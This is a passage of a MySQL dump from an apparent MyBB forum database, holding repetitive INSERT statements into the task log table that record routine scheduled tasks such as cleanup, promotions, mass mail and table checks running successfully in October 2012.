'1350126012', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9864', '1', '1350126026', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9865', '7', '1350126223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9866', '5', '1350126341', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9867', '9', '1350126675', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9868', '5', '1350127507', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9869', '9', '1350127532', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9870', '3', '1350127888', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9871', '9', '1350128810', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9872', '5', '1350128896', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9873', '9', '1350129428', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9874', '3', '1350129615', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9875', '1', '1350129636', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9876', '4', '1350129640', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9877', '7', '1350129723', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9878', '5', '1350129940', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9879', '9', '1350130375', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9880', '5', '1350131303', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9881', '9', '1350131525', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9882', '3', '1350131533', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9883', '9', '1350132008', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9884', '5', '1350132307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9885', '9', '1350132980', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9886', '3', '1350133181', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9887', '1', '1350133294', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9888', '7', '1350133301', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9889', '5', '1350133909', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9890', '9', '1350133937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9891', '5', '1350134829', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9892', '9', '1350134860', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9893', '3', '1350135413', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9894', '9', '1350135618', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9895', '5', '1350136509', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9896', '9', '1350137100', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9897', '3', '1350137105', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9898', '1', '1350137118', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9899', '7', '1350137119', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9900', '5', '1350137122', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9901', '9', '1350137580', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9902', '5', '1350139966', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9903', '9', '1350139984', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9904', '3', '1350139995', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9905', '9', '1350140111', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9906', '3', '1350142043', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9907', '1', '1350142048', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9908', '7', '1350142051', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9909', '5', '1350142177', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9910', '9', '1350142225', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9911', '3', '1350142871', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9912', '9', '1350143266', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9913', '5', '1350143271', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9914', '9', '1350143827', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9915', '3', '1350144031', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9916', '1', '1350144034', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9917', '7', '1350144037', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9918', '5', '1350144307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9919', '9', '1350144873', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9920', '5', '1350145763', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9921', '9', '1350145773', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9922', '3', '1350145801', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9923', '9', '1350147554', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9924', '5', '1350147843', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9925', '3', '1350147852', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9926', '1', '1350147870', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9927', '7', '1350147898', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9928', '5', '1350147902', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9929', '9', '1350148299', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9930', '5', '1350149428', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9931', '9', '1350149473', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9932', '3', '1350149481', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9933', '9', '1350150475', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9934', '5', '1350150482', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9935', '9', '1350150920', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9936', '3', '1350151243', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9937', '1', '1350151246', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9938', '7', '1350151248', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9939', '5', '1350151502', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9940', '9', '1350151819', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9941', '5', '1350152740', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9942', '9', '1350152745', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9943', '3', '1350153001', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9944', '9', '1350153619', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9945', '5', '1350153906', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9946', '9', '1350154508', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9947', '3', '1350154969', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9948', '1', '1350154972', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9949', '7', '1350154976', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9950', '5', '1350155151', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9951', '9', '1350155495', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9952', '5', '1350156307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9953', '9', '1350156312', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9954', '3', '1350156655', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9955', '9', '1350157204', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9956', '5', '1350157528', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9957', '9', '1350158153', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9958', '3', '1350158869', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9959', '1', '1350158874', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9960', '7', '1350158899', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9961', '5', '1350158911', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9962', '9', '1350159026', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9963', '5', '1350160313', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9964', '9', '1350160327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9965', '3', '1350160416', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9966', '9', '1350160857', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9967', '5', '1350162416', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9968', '9', '1350162735', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9969', '3', '1350162766', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9970', '1', '1350162799', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9971', '7', '1350162806', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9972', '5', '1350163512', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9973', '9', '1350163543', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9974', '3', '1350163811', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9975', '9', '1350164442', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9976', '5', '1350164702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9977', '9', '1350165318', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9978', '3', '1350165549', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9979', '1', '1350165604', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9980', '7', '1350165625', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9981', '5', '1350165923', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9982', '9', '1350166535', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9983', '5', '1350167105', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9984', '9', '1350167145', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9985', '3', '1350167601', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9986', '9', '1350168145', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9987', '5', '1350168574', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9988', '9', '1350169013', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9989', '3', '1350169180', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9990', '1', '1350169215', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9991', '7', '1350169231', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9992', '5', '1350169521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9993', '9', '1350169811', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9994', '5', '1350170708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9995', '9', '1350170728', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9996', '3', '1350171018', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9997', '9', '1350171628', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9998', '5', '1350172386', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9999', '9', '1350172549', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10000', '3', '1350172970', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10001', '1', '1350172982', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10002', '2', '1350172984', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10003', '7', '1350173007', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10004', '11', '1350173016', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10005', '5', '1350173109', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10006', '9', '1350173823', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10007', '5', '1350174307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10008', '9', '1350174343', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10009', '3', '1350174608', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10010', '9', '1350175312', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10011', '5', '1350175682', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10012', '9', '1350176132', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10013', '3', '1350176420', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10014', '1', '1350176438', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10015', '7', '1350176446', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10016', '5', '1350176725', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10017', '9', '1350177207', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10018', '5', '1350178166', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10019', '9', '1350179030', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10020', '3', '1350179039', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10021', '5', '1350179209', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10022', '9', '1350180694', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10023', '3', '1350180705', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10024', '1', '1350180820', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10025', '7', '1350180823', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10026', '5', '1350180825', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10027', '5', '1350181844', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10028', '9', '1350181848', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10029', '3', '1350181854', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10030', '9', '1350182940', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10031', '5', '1350183212', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10032', '9', '1350183328', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10033', '3', '1350183565', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10034', '1', '1350183613', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10035', '7', '1350183695', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10036', '5', '1350183919', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10037', '9', '1350184252', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10038', '5', '1350185124', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10039', '9', '1350185166', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10040', '3', '1350185525', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10041', '9', '1350186526', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10042', '5', '1350186532', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10043', '9', '1350187401', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10044', '3', '1350187534', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10045', '1', '1350187770', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10046', '7', '1350187776', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10047', '5', '1350187786', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10048', '9', '1350188810', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10049', '5', '1350188823', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10050', '3', '1350189013', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10051', '9', '1350190534', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10052', '5', '1350190560', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10053', '3', '1350191075', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10054', '1', '1350191093', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10055', '7', '1350191139', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10056', '5', '1350191151', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10057', '9', '1350192918', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10058', '5', '1350192975', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10059', '3', '1350193608', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10060', '9', '1350193610', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10061', '5', '1350193630', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10062', '9', '1350194119', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10063', '3', '1350194533', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10064', '1', '1350194533', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10065', '7', '1350194548', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10066', '5', '1350194864', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10067', '9', '1350195274', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10068', '5', '1350195944', 'The promotions task successfully ran.'); INSERT INTO 